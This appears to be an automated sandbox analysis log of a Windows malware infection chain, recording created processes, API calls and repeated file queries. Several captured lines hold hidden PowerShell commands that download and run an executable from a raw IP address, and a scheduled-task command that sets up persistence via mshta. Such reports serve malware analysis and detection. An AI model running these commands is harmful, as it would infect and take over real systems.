                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                                                Source: C:\Windows\System32\mshta.exeProcess created: unknown unknown
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeProcess created: unknown unknown
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UIP4BmakpNx /tr "mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00C70B62
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C71663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00C71663
                                                Source: aV2ffcSuKl.exe, 00000000.00000000.1292608994.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp, 132fd7f0ed.exe, 0000001E.00000000.2085502700.0000000000382000.00000002.00000001.01000000.00000019.sdmp, 132fd7f0ed.exe, 0000003D.00000000.2228800526.0000000000382000.00000002.00000001.01000000.00000019.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                                                Source: aV2ffcSuKl.exeBinary or memory string: Shell_TrayWnd
                                                Source: ILqcVeT.exe, 00000017.00000002.2388746724.00000000013AB000.00000040.00000001.01000000.00000013.sdmpBinary or memory string: TProgram Manager
                                                Source: vertualiziren.exe, 00000018.00000002.2029919575.000000000058F000.00000040.00000001.01000000.00000014.sdmpBinary or memory string: z}Program Manager
                                                Source: rapes.exe, TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEBinary or memory string: FProgram Manager
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000B.00000002.1410046761.0000000000819000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 0000000C.00000002.1440658928.00000000004A9000.00000040.00000001.01000000.0000000F.sdmp, rapes.exe, 0000000D.00000002.1443703711.00000000004A9000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: FProgram Manager
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C30698 cpuid 0_2_00C30698
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: EnumSystemLocalesW,20_2_00BF21B3
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: EnumSystemLocalesW,20_2_00BF2168
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,20_2_00BF22D9
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: EnumSystemLocalesW,20_2_00BE825C
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: EnumSystemLocalesW,20_2_00BF224E
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: GetLocaleInfoW,20_2_00BF252C
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,20_2_00BF2652
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: GetLocaleInfoW,20_2_00BE877E
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: GetLocaleInfoW,20_2_00BF2758
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,20_2_00BF2827
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,20_2_00BF1EC6
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: EnumSystemLocalesW,21_2_00CF21B3
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: EnumSystemLocalesW,21_2_00CF2168
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,21_2_00CF22D9
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: EnumSystemLocalesW,21_2_00CF224E
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: EnumSystemLocalesW,21_2_00CE825C
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: GetLocaleInfoW,21_2_00CF252C
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,21_2_00CF2652
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: GetLocaleInfoW,21_2_00CF2758
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: GetLocaleInfoW,21_2_00CE877E
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,21_2_00CF2827
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,21_2_00CF1EC6
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111060121\am_no.cmd VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111060121\am_no.cmd VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111190101\acd63ce6fe.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111190101\acd63ce6fe.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111200101\5a57aa51d3.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111200101\5a57aa51d3.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111210101\f0b421a199.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111210101\f0b421a199.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
